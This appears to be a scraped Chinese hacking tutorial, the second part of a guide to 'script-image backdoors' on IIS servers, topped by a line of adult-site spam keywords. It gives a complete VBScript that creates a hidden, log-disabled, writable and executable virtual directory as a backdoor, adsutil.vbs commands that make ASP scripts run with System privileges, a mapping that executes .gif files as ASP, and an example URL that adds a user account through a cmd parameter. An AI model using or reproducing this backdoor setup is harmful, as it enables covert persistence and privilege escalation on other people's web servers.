日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

腳本圖片類后門病毒的完美使用方法( 二 )

云知道


其中有一個值:ScriptMaps,代表腳本映射 。當我們在某個虛擬目錄下設(shè)定ScriptMaps值后,則向該目錄請求的特定擴展名的文件都會交給指定的ISAPI執(zhí)行 。需要強調(diào)的是,設(shè)定ScriptMaps的目錄并不一定要真實存在的,只要在MetaBase中某個HTTP實例的root鍵下建了一個子鍵,對該字鍵同名的虛擬目錄的HTTP請求IIS會認為是合法的,并會交由映射的ISAPI處理 。
【腳本圖片類后門病毒的完美使用方法】這樣說可能誰都暈了(包括我),其實簡單的作個類比:MetaBase的就夠類似于注冊表,我們知道,我們在安裝有些程序的時候,安裝程序會在注冊表中建立一些必要的值,可我們一旦非正規(guī)把它安裝的文件刪除了時(比如有些朋友刪游戲時就是直接往回收站一拉了事),注冊表中的那些項就會被留下,沒有用處,而造成注冊表垃圾 。MetaBase中也是那么回事,我們正常建立一個虛擬目錄時,MetaBase中就會建立一些項 。而當我們通過非正常手段刪除了此虛擬目錄時,那些項就會留下,與注冊表不同的是,那些項還會起作用,只要我們用http請求了那個虛擬目錄,IIS就會依舊按照MetaBase中的原來的虛擬目錄設(shè)置順利返回 。
所以即使目錄不存在,只要他曾經(jīng)存在過,那么就成立 。呵呵,聽懂了沒?(PS:還沒懂)暈,那就只好請您看動鯊的那篇文章了,他說得可比我清楚 。至于如何添加不可見的虛擬目錄,動鯊的那篇文章說得很清楚了,我這里就不廢話了,下面提供動鯊的添加不可見虛擬目錄的腳本,保存為iis.vbs: 代碼 help1=IIS后門設(shè)置器 FOR WIN2000 BY 動鯊 5月30號2004 年 help2=請輸入正確的虛擬目錄名稱和映射的路徑,格式如下 help3= cscript.exe iis.vbs 虛擬目錄的名稱 映射的路徑 help4=例如: cscript.exe iis.vbs backdoor c: set Args = Wscript.Arguments if args.count < 2 then wscript.echo help1 wscript.echo wscript.echo help2 wscript.echo wscript.echo help3 wscript.echo wscript.echo help4 wscript.quit end if strVRName=args(0) 虛擬目錄名稱 strRootPath=args(1) 虛擬目錄路徑 Set checkVirtualDir=GetObject(IIS://LocalHost/W3SVC/1/Root) For each VR in checkVirtualDir if VR.Name=lhxy Then foundt =yes else foundt= no End If Next if foundt =yes then wscript.echo 發(fā)現(xiàn)已經(jīng)創(chuàng)建了lhxy目錄,正在設(shè)置自定義的虛擬目錄 creatvdir else wscript.echo 正在創(chuàng)建lhxy目錄,以及自定義文件夾,請等待!
creatlhxy creatvdir end if wscript.echo 你創(chuàng)建的虛擬目錄名稱是& strVRName &,映射的文件夾是 & strRootPath & 。wscript.echo 請訪問http://IP/lhxy/& strVRName &/ 來連接后門! wscript.echo 恭喜!后門設(shè)置全部完成! sub creatlhxy() Set objDir=GetObject(IIS://LocalHost/W3SVC/1/Root) Set myDir=objDir.Create(IISWebVirtualDir,lhxy) myDir.AccessRead=true myDir.DefaultDoc=mydir.DefaultDoc myDir.AppIsolated=0 myDir.AccessExecute=true myDir.DontLog=true myDir.AccessSource=true myDir.EnableDirBrowsing=true myDir.setinfo end sub sub creatvdir() Set objVirtualDir=GetObject(IIS://LocalHost/W3SVC/1/Root/lhxy) Set VirDir=objVirtualDir.Create(IISWebVirtualDir,strVRName) VirDir.AccessRead=true VirDir.Path=strRootPath VirDir.DefaultDoc= VirDr.AccessExecute=true VirDir.AccessWrite=true VirDir.AccessSource=true VirDir.AppIsolated=0 VirDir.DontLog=true VirDir.EnableDirBrowsing=true VirDir.appcreate 0 VidDir.CreateProcessAsUser=0 VirDir.setInfo end sub wscript.quit 我記得Bugkidz好像也曾經(jīng)貼出過類似的腳本 。呵呵,沒仔細看,大家不要打我,自己找吧,或是找Boy要,呵呵 。
下面是通過adsutil.vbs把asp.dll添加到InProcessIsapiApps數(shù)組中的命令,使得所有asp腳本都會以System權(quán)限執(zhí)行 。代碼 cscript adsutil.vbs set /W3SVC/InProcessIsapiApps C:WINNTSystem32idq.dll C:WINNTSystem32inetsrvhttpext.dll C:WINNTSystem32inetsrvhttpodbc.dll C:WINNTSystem32inetsrvssinc.dll C:WINNTSystem32msw3prt.dll C:winntsystem32inetsrvasp.dll 不過需要注意,adsutil.vbs只能設(shè),不能改,所以用adsutil.vbs的時候一定要把原先的也加上,否則原先的就會丟失 。不同條目之間用空格分開 。然后把你的虛擬目錄加上應(yīng)用程序映射: 代碼 cscript adsutil.vbs set w3svc/1/root/lhxy/wofeiwo/ScriptMaps gif,C:winntsystem32inetsrvasp.dll,1 我這里的虛擬目錄是lhxy/wofeiwo,圖片擴展名是.gif大家可以根據(jù)自己實際情況更改 。好了,我們看看效果吧: 代碼 http://www.xxx.com/lhxy/wofeiwo/1.gif?cmd=net user wofeiwo w1o2f3e4i5w6o /add

推薦閱讀